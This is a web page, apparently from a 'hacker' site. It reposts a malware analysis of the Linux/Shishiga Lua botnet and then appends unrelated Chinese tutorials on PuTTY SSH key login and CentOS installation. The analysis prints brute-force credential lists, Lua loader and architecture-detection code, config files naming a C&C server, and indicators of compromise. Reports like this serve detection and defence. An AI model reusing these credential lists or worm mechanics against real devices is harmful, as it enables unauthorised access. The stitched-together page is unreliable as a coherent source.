Linux Shishiga malware using LUA scripts CHINAhackerkskchina www.hackerschina.org

Among all the Linux samples that we receive every day, we noticed one sample detected only by Dr.Web – their detection name was Linux.LuaBot. We deemed this to be suspicious as our detection rates for the Luabot family have generally been high. Upon analysis, it turned out that this was, indeed, a bot written in Lua, but it represents a new family, and is not related to previously seen Luabot malware. Thus, we’ve given it a new name: Linux/Shishiga. It uses 4 different protocols (SSH – Telnet – HTTP – BitTorrent) and Lua scripts for modularity.

How to Meet Shishiga?

Linux/Shishiga targets GNU/Linux systems. Its infection vector is a very common one: bruteforcing weak credentials based on a password list. It does this in a similar fashion to Linux/Moose with the added capability to bruteforce SSH credentials too. Here is the complete credentials list at the time of writing:

bftelnet.lua
[...]local accounts={    {"admin","admin"},    {"root","root"},    {"adm","adm"},    {"acer","acer"},    {"user","user"},    {"security","security"}}[...]
bfssh.lua
[...]local accounts={    {"admin","admin"},    {"root","root"},    {"adm","adm"},    {"ubnt","ubnt"},    {"root",""},    {"admin",""},    {"adm",""},    {"user","user"},    {"pi","pi"},}--[[    {"acer","acer"},    {"security","security"},    {"root","toor"},    {"root","roottoor"},    {"root","password"},    {"root","test"},    {"root","abc123"},    {"root","111111"},    {"root","1q2w3e"},    {"root","oracle"},    {"root","1q2w3e4r"},    {"root","123123"},    {"root","qwe123"},    {"root","p@ssw0rd"},    {"root","1"},    {"root","12"},    {"root","123"},    {"root","1234"},    {"root","12346"},    {"root","123467"},    {"root","1234678"},    {"root","12346789"},    {"root","123467890"},    {"root","qwerty"},    {"root","pass"},    {"root","toor"},    {"root","roottoor"},    {"root","password123"},    {"root","password123456"},    {"root","pass123"},    {"root","password"},    {"root","passw0rd"},    {"root","1qaz"},    {"root","1qaz2wsx"},    {"root","asdfgh"},    {"user","user"},    {"user",""},    {"acer","acer"},    {"security","security"},    {"root","passw0rds"},]][...]

We found several binaries of Linux/Shishiga for various architectures such as MIPS (both big- and little-endian), ARM (armv4l), i686, and also PowerPC. These are common for IoT devices. We think that other architectures like SPARC, SH-4 or m68k could be supported as we will explain later.

Shishiga’s skills

Linux/Shishiga is a binary packed with UPX 3.91 (Ultimate Packer for Executables), but the UPX tool will have trouble unpacking these binaries because Shishiga adds data at the end of the packed file.

After unpacking, we see that it’s statically linked with the Lua runtime library and stripped of all symbols.

$ file unpacked.i686.lmunpacked.i686.lm: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux),statically linked, stripped

Once executed, the binary will initialize the malware Lua module with the following methods:

Malware methods
malware_module_methods  dd offset aGetver       ; "getver"                        dd offset getver                        dd offset aGetos        ; "getos"                        dd offset getos                        dd offset aGetarch      ; "getarch"                        dd offset getarch                        dd offset aGetmacaddr   ; "getmacaddr"                        dd offset getmacaddr                        dd offset aGetmods      ; "getmods"                        dd offset getmods                        dd offset aSetargs      ; "setargs"                        dd offset setargs

The getmods method will return the archive blob as we will explain later. Then hardcoded Lua code (malware.lua) is executed via the luaL_loadstring and lua_pcall functions. The Lua code is quite straightforward, but here is a quick walkthrough of the source code without any modifications from our part.

malware.lua
local unistd=require("posix.unistd")require("malware")function getexe()    local fn=unistd.readlink("/proc/self/exe")    if fn==nil and arg~=nil then        fn=arg[0] --symlink removed    end    if fn==nil then        print("couldn't find bot file")        return nil    end    local file=io.open(fn,"r")    if file==nil then        print("couldn't find bot file")        return nil    end    local data=file:read("*all")    file:close()    return dataendfunction getMods()    return zlib.inflate()(malware.getmods())endfunction getScriptFiles(scripts)    local files={}    local i=1    while true do        local a1,b1,c1=string.find(scripts,'%-%-script%-begin%-%-([%w%.]+)%-%-',i)        if a1==nil then            break        end        local a2,b2,c2=string.find(scripts,'%-%-script%-end%-%-([%w%.]+)%-%-',i)        if a2==nil then            break        end        if c1~=c2 then            return nil        end        local src=string.sub(scripts,b1+1,a2-1)        i=b2+1        files[c1]=src    end    return filesendmalware.exe=getexe() (1)local modules=getScriptFiles(getMods()) (2)[...]f=load(malware.modules['main.lua']) (3)local s,err=pcall(f)if s==false then    print(err)end
(1)open the malware executable file from /proc/self/exe and return its content;
(2)retrieve the zlib archive via getmods method, decompresses it, then parses it using tags and stores it in a Lua’s array;
(3)call main.lua module;

There is an exhaustive list of all Lua scripts found in the IoCs section. Most of them have self-explanatory filenames, but here is a brief summary of some of them.

callhome.lua

  • retrieve the configuration file server.bt or servers from config.lua;
  • if unable to reach the current default server, change to a different server;
  • send files (reports or accounts, both JSON formatted);
  • execute tasks from task list retrieved from the C&C server;

bfssh.lua / bftelnet.lua

  • module to bruteforce SSH and Telnet logins;
  • check if the command echo -en "\\x31\\x33\\x33\\x37" outputs 1337; if not, exit else continue;
  • device architecture is determined from the /bin/ls file by running cat /bin/ls and parsing theELF header, see below;
  • spread the malware (both .lm and .dm files) according to the device architecture;
  • save successful credentials;

The architecture checking code is as follows:

bfssh.lua, getArchELF method
function bfssh.getArchELF(text)	local bits,denc,ver,ftype,farch	if text==nil then		return nil	end	local i=text:find("\x7fELF") (1)	if i~=nil then		bits,denc,ver=string.unpack("<BBB",text:sub(i+4))		if denc==1 then			ftype,farch=string.unpack("<HH",text:sub(i+16)) (2)		else			ftype,farch=string.unpack(">HH",text:sub(i+16))		end	end	return bits,denc,farch (3)end
(1)every ELF file has to start with \x7fELF
(2)ftype that represents e_type (ELF file type = executable, shared etc.) is not used
(3)bits represents e_ident[EI_CLASS] (32-bit or 64-bit), denc represents e_ident[EI_DATA](little or big endian), and farch represents e_machine in the ELF header
bfssh.lua, getArchName method
function bfssh.getArchName(bits,denc,farch) (1)        if farch==0x8 and denc==1 then (2)                return "mipsel"        end        if farch==0x8 and denc==2 then                return "mips"        end        if farch==0x28 then                return "armv4l"        end        if farch==0x2 then                return "sparc"        end        if farch==0x2a then                return "sh4"        end        if farch==0x4 then                return "m68k"        end        if farch==0x14 then                return "powerpc"        end        if farch==0x3 or farch==0x7 or farch==0x3e then (3)                return "i686"        end        return nilend
(1)bits is not used
(2)check if file is for MIPS little endian (e_machine == EM_MIPS and e_ident[EI_DATA] ==ELFDATA2LSB)
(3)check if file is for Intel 80386 or Intel 80860 or AMD x86-64 (e_machine == EM_386 ore_machine == EM_860 or e_machine == EM_X86_64)

config.lua

  • contains publicKey to verify the signature of the binary (.lm or .dm);
  • contains bootstrap nodes list;
  • contains filenames of .bt files, port numbers of SOCKS and HTTP server;
  • contains IP address of the server (probably C&C server);

persist.lua

  • persistence method depending on the privilege (root or user)

scanner.lua

  • used to generate random /16 networks that are not local

worm.lua (this script was removed in the latest version of Linux/Shishiga)

  • allows scanning on a given port;
  • allows upload;
  • gets information from the new infected server;

The readme.lua script has a message banner that grabs your attention, if you speak Russian:

           ВСЁ ИДЁТ ПО ПЛАНУА при коммунизме всё будет заебисьОн наступит скоро — надо только подождатьТам всё будет бесплатно,там всё будет в кайфТам наверное вощще не надо будет (умирать)Я проснулся среди ночи и понял, что -           ВСЁ ИДЁТ ПО ПЛАНУ

This translates to:

            EVERYTHING GOES ACCORDING TO PLANWhen we get communism it'll all be fucking great.It will come soon, we just have to wait.Everything will be free there, everything will be fun.We'll probably not even have to die.I woke up in the middle of the night and realized            EVERYTHING GOES ACCORDING TO PLAN

It seems that the malware author was inspired by E.Letov and his album Everything goes according to plan – see the last verse of the title song.

Over the past few weeks, we observed some minor changes like parts of some modules being rewritten, addition of testing modules, removal of redundant files, but nothing especially noteworthy.

While the main binary is named <architecture>.lm, we also managed to retrieve binaries with the following name <architecture>.dm – a simple backdoor that listens on 0.0.0.0 (all IPv4 addresses) port 2015. One of the small changes was in the name of this backdoor binary – it changed from dl to dm.

Shishiga communication

Linux/Shishiga can communicate using any of the modules httpproto.lua, btloader.lua orserver.lua. The httpproto.lua module has functions that allow the given data to be encoded or decoded, and make HTTP POST and GET requests. The source code below shows the process of encoding data.

httpproto.lua
[...]function httpproto.encode(data)    local msg=bencode.encode(data)    local c=zlib.crc32()(msg)    local k=string.pack("<I",utils.random())    return k..crypto.rc4(k,string.pack("<I",c)..msg)end[...]

btloader.lua uses the torrent.lua module (a wrapper for BitTorrent functions) to save or load nodes from the nodes.cfg file. It also retrieves its configuration data from{server,update,script}.bt files (in Bencode format) and uses the BitTorrent protocol to check for new versions of these files. script.bt allows the execution of a Lua script and update.bt allows executing the .lm binary. Below are examples of decoded .bt files shown as Python dictionaries.

script.bt
{    'sig': <removed>,(1)    'k': <removed>,(2)    'salt': 'script',    'seq': 1486885364,    'v': 'caba4dbe2f7add9371b94b97cf0d351b72449072,test.lua\n'}
(1)signature
(2)public key
update.bt
{    'sig': <removed>,    'k': <removed>,    'salt': 'update',    'seq': 1486885364,    'v':        'bf4d9e25fc210a1d9809aebb03b30748dd588d08,mipsel.lm\n        8a0d58472f6166ade0ae677bab7940fe38d66d35,armv4l.lm\n        51a4ca78ebb0649721ae472290bea7bfe983d727,mips.lm\n        979fb376d6adc65473c4f51ad1cc36e3612a1e73,powerpc.lm\n        ce4b3c92a96137e6215a5e2f5fd28a672eddaaab,i686.lm\n'}
server.bt
{    'sig': <removed>,    'k': <removed,    'salt': 'server',    'seq': 1486835166,    'v': '93.117.137.35:8080\n'}

Finally, server.lua module’s main functionality is to create an HTTP server with the port defined inconfig.lua. In all samples we have analyzed so far, that is port 8888.

The server responds only to /info and /upload requests. Below is a (prettified) version of the server response to the /info path. All of the files below can be easily downloaded from the infected device.

{    "src":[ (1)        "test.lua",        "test1.lua",        "test10.lua",        "test2.lua",        "test3.lua",        "test5.lua",        "test6.lua",        "test_1.lua",        "test_2.lua",        "test_3.lua",        "test_4.lua"    ],    "dm":[ (2)        "armv4l.dm",        "i686.dm",        "mips.dm",        "mipsel.dm"    ],    "bt":[ (3)        "script.bt",        "server.bt",        "update.bt"    ],    "version":"1.0.0", (4)    "lua":[ (5)        "armv4l.lm",        "i686.lm",        "mips.lm",        "mipsel.lm",        "powerpc.lm"    ],    "os":"lin",    "arch":"i686",    "lua_version":"Lua 5.3"}
(1)Lua scripts
(2)backdoor (old name: .dl)
(3)BitTorrent scripts
(4)malware version
(5)modules loader

Querying the root / on port 8888 will result in HTTP/1.0 404 OK, which serves as a simple indicator of compromise (IoC).

http.lua response function
function http.response(req,code,data,timeout)    timeout=timeout or timeoutDef    local hdr="HTTP/1.0 %d OK\r\nContent-Length: %d\r\nConnection: close\r\n\r\n"    async.sendall(req.sock,hdr:format(code,data:len())..data,timeout)    return trueend

At this point in our investigation, we asked the Censys team to do a mass scan of the Internet on TCP port 8888. They found about 10 IP addresses that match this particular HTTP answer. These IP addresses are potentially infected machines.

Conclusion

At a first glance, Linux/Shishiga might appear to be like the others, spreading through weak Telnet and SSH credentials, but the usage of the BitTorrent protocol and Lua modules separates it from the herd. BitTorrent used in a Mirai-inspired worm, Hajime, was observed last year and we can only speculate that it might become more popular in the future.

It’s possible that Shishiga could still evolve and become more widespread but the low number of victims, constant adding, removing, and modifying of the components, code comments and even debug information, clearly indicate that it’s a work in progress. To prevent your devices from being infected by Shishiga and similar worms, you should not use default Telnet and SSH credentials.

We would like to thank the Censys team for their collaboration.

IoCs

C&C

93.117.137.35

SHA-1 hashes (.lm)
003f548796fb52ad281ae82c7e0bb7532dd342411a79092c6468d39a10f805c96ad7f8bf303b7dc81cc1b97f8f9bb7c4f435ef1316e08e5331b4331b2889803777e2dfec7684512f45e87248a07d508f2a809d37be5aa0655f5cc997eb62683e1b45da173f1ef05ca850e2f5030ee279b1c589c9e3cc576c41bf0d5612ba5bc9a05e9d94df0f841b159264a04bc106f6231daa6641783dd9276b4f5c7fc415894d55efe18643d7408cbe12dd4f319a68084bd11e4df58ab26f0fc8ec2d1513611ca2b852e710709651a4ca78ebb0649721ae472290bea7bfe983d7275a88b67d8dfaf1f68308311b808f00e769e39e466458c48e5167a2371d9243d4b47ad191d642685b688ccbca8b2918a161917031e21b6810c59eeab06e3ba86d1f91669e87945b8ea0211b58e315e1896f41c8f797814e2e3f073601ce81e8adceef6a278a0d58472f6166ade0ae677bab7940fe38d66d358a1f9212f181e68a63e06a955e64d333b78c6bf68e3c4eb04d4cfd8f44c721111c5251d30ac848b6979fb376d6adc65473c4f51ad1cc36e3612a1e73a1f2535576116d93b62d7f5fc6e30e66e0e0a216a694c6ecc2ff9702905f22b14ed448e9e76fe531ac094b239851eaf2e9fd309285c0996fb33771a8b14f7af9665ef77af530109a0331f8ca0bd2a167b86935c4539901cdec9081d8a8ca915903adaff1ba5df105496b0c4df7206d29fa544b7a7a346735bf4d9e25fc210a1d9809aebb03b30748dd588d08c22f0fb01c6d47957732a8b0f5ef0f7d4e614c79ce4b3c92a96137e6215a5e2f5fd28a672eddaaabd8a5d9c4605b33bd47fedbad5a0da9928de6aa33f73022a4801e06d675e5c3011060242af7b949ad
SHA-1 hashes (.dl)
274181d2f9c6b8f0e217db23f1d39aa94c161d6e8abbb049bffd679686323160ca4b6a86184550a195444c2ccc5fff19145d60f1e817fd682cabe0cd9cde845852653339f67667c2408126f02f246949
Lua’s scripts filename
async.luaasync.lua.oldbencode.luabfssh.luabfssh.lua.old2bftelnet.luabtloader.luacallhome.luacallhome.lua.oldconfig.luacrypto.luadht.luaevent.luaevs.luahttp.luahttpproto.lualibevent2.lualuaevent.luamain.luamain2.luamalware.luapersist.luareadme.luarouting.luascanner.luascanner2.luaserver.luasocket.luasocks.luassh.luassl.luatelnet.luatest.luatest1.luatest10.luatest2.luatest3.luatest5.luatest6.luathreads.luatorrent.luaudp.luautils.luaworm.lua
Files that could potentially indicate an infection
/tmp/.local/*/tmp/drop/tmp/srv$HOME/.local/ssh.txt$HOME/.local/telnet.txt$HOME/.local/nodes.cfg$HOME/.local/check$HOME/.local/script.bt$HOME/.local/update.bt$HOME/.local/server.bt$HOME/.local/syslog$HOME/.local/syslog.pid$HOME/.local/{armv4l,i686,mips,mipsel}.{dl,dm}$HOME/.local/{armv4l,i686,mips,mipsel,powerpc}.lm
/etc/rc2.d/S04syslogd/etc/rc3.d/S04syslogd/etc/rc4.d/S04syslogd/etc/rc5.d/S04syslogd/etc/init.d/syslogd/bin/syslogd/etc/cron.hourly/syslogd

中国骇客云教你Linux 远程登录

Linux 远程登录

Linux一般作为服务器使用,而服务器一般放在机房,你不可能在机房操作你的Linux服务器。

这时我们就需要远程登录到Linux服务器来管理维护系统。

Linux系统中是通过ssh服务实现的远程登录功能,默认ssh服务端口号为 22。

Window系统上 Linux 远程登录客户端有SecureCRT, Putty, SSH Secure Shell等,本文以Putty为例来登录远程服务器。

putty下载地址:http://www.putty.org/

如果你下载了putty,请双击putty.exe 然后弹出如下的窗口。

5_1

在Host Name( or IP address) 下面的框中输入你要登录的远程服务器IP(可以通过ifconfig命令查看服务器ip),然后回车。

5_12

此时,提示我们输入要登录的用户名。

5_13

输入root 然后回车,再输入密码,就能登录到远程的linux系统了。

5_14


使用密钥认证机制远程登录linux

SSH 为 Secure Shell 的缩写,由 IETF 的网络工作小组(Network Working Group)所制定。

SSH 为建立在应用层和传输层基础上的安全协议。

首先使用工具 PUTTYGEN.EXE 生成密钥对。打开工具PUTTYGEN.EXE后如下图所示:

5_15

该工具可以生成三种格式的key :SSH-1(RSA) SSH-2(RSA) SSH-2(DSA) ,我们采用默认的格式即SSH-2(RSA)。Number of bits in a generated key 这个是指生成的key的大小,这个数值越大,生成的key就越复杂,安全性就越高。这里我们写2048.

5_16

然后单击Generate 开始生成密钥对:

5_17

注意的是,在这个过程中鼠标要来回的动,否则这个进度条是不会动的。

5_18

到这里,密钥对已经生成了。你可以给你的密钥输入一个密码,(在Key Passphrase那里)也可以留空。然后点 Save public key 保存公钥,点 Save private Key 保存私钥。笔者建议你放到一个比较安全的地方,一来防止别人偷窥,二来防止误删除。接下来就该到远程linux主机上设置了。

1)创建目录 /root/.ssh 并设置权限

[root@localhost ~]# mkdir /root/.ssh mkdir 命令用来创建目录,以后会详细介绍,暂时只了解即可。

[root@localhost ~]# chmod 700 /root/.ssh chmod 命令是用来修改文件属性权限的,以后会详细介绍。

2)创建文件 / root/.ssh/authorized_keys

[root@localhost ~]# vim /root/.ssh/authorized_keys vim 命令是编辑一个文本文件的命令,同样在后续章节详细介绍。

3)打开刚才生成的public key 文件,建议使用写字板打开,这样看着舒服一些,复制从AAAA开头至 “—- END SSH2 PUBLIC KEY —-” 该行上的所有内容,粘贴到/root/.ssh/authorized_keys 文件中,要保证所有字符在一行。(可以先把复制的内容拷贝至记事本,然后编辑成一行载粘贴到该文件中)。

在这里要简单介绍一下,如何粘贴,用vim打开那个文件后,该文件不存在,所以vim会自动创建。按一下字母”i”然后同时按shift + Insert 进行粘贴(或者单击鼠标右键即可),前提是已经复制到剪切板中了。粘贴好后,然后把光标移动到该行最前面输入 ssh-rsa ,然后按空格。再按ESC,然后输入冒号wq 即 :wq 就保存了。格式如下图:

5_19

4)再设置putty选项,点窗口左侧的SSh –> Auth ,单击窗口右侧的Browse… 选择刚刚生成的私钥, 再点Open ,此时输入root,就不用输入密码就能登录了。

中国骇客云官网:www.hackerschina.org

5_20

如果在前面你设置了Key Passphrase ,那么此时就会提示你输入密码的。为了更加安全建议大家要设置一个Key Passphrase。

中国骇客云教您Linux 怎么安装?好多朋友问我。。。那么我就来给大家分享一下咯、

Linux 安装

本章节我们将为大家介绍Linux的安装。

本章节以 centos6.4 为例。

centos6.4 下载地址:

注:建议安装64位Linux系统。

接下来你需要将下载的Linux系统刻录成光盘或U盘。

注:你也可以在Window上安装VMware虚拟机来安装Linux系统。


Linux 安装步骤

1、首先,使用光驱或U盘或你下载的Linux ISO文件进行安装。

界面说明:

image001

Install or upgrade an existing system 安装或升级现有的系统

install system with basic video driver 安装过程中采用基本的显卡驱动

Rescue installed system 进入系统修复模式

Boot from local drive   退出安装从硬盘启动

Memory test  内存检测

注:用联想E49安装时选择第一项安装时会出现屏幕显示异常的问题,后改用第二项安装时就没有出现问题

2、这时直接”skip”就可以了

image002

3、出现引导界面,点击”next”

image003

4、选中”English(English)”否则会有部分乱码问题

image004

5、键盘布局选择”U.S.English”

image005

6、选择”Basic Storage Devies”点击”Next”

image006

7、询问是否忽略所有数据,新电脑安装系统选择”Yes,discard any data”

image007

8、Hostname填写格式”英文名.姓”

image008

9、网络设置安装图示顺序点击就可以了

image009

10、时区可以在地图上点击,选择”shanghai”并取消System clock uses UTC前面的对勾

image010

11、设置root的密码

image011

12、硬盘分区,一定要按照图示点选

image012

13、调整分区,必须要有/home这个分区,如果没有这个分区,安装部分软件会出现不能安装的问题

image013

14、询问是否格式化分区

image014

15、将更改写入到硬盘

image015

16、引导程序安装位置

image016

17、最重要的一步,也是本教程最关键的一步,也是其他教程没有提及的一步,按图示顺序点击

image017

18、取消以下内容的所有选项

Applications

Base System

Servers

并对Desktops进行如下设置

即取消如下选项:

Desktop Debugging and Performance Tools

Desktop Platform

Remote Desktop Clients

Input Methods中仅保留ibus-pinyin-1.3.8-1.el6.x86_64,其他的全部取消

image018

image019

19、选中Languages,并选中右侧的Chinese Support然后点击红色区域

image020

20、调整完成后如下图所示

image021

21、至此,一个最精简的桌面环境就设置完成了,

image022

22、安装完成,重启

image023

23、重启之后,的License Information

image024

24、Create User

Username:填写您的英文名(不带.姓)

Full Name:填写您的英文名.姓(首字母大写)

image025

25、”Date and Time” 选中 “Synchronize data and time over the network”

Finsh之后系统将重启

image026

26、第一次登录,登录前不要做任何更改,这个很重要!!!登录之后紧接着退出

第二次登录,选择语言,在红色区域选择下拉小三角,选other,选中”汉语(中国)”

image027

image028

27、登录之后,请一定按照如下顺序点击!

至此,CentOS安装完成,如有其他问题,请随时与我联系!!

image029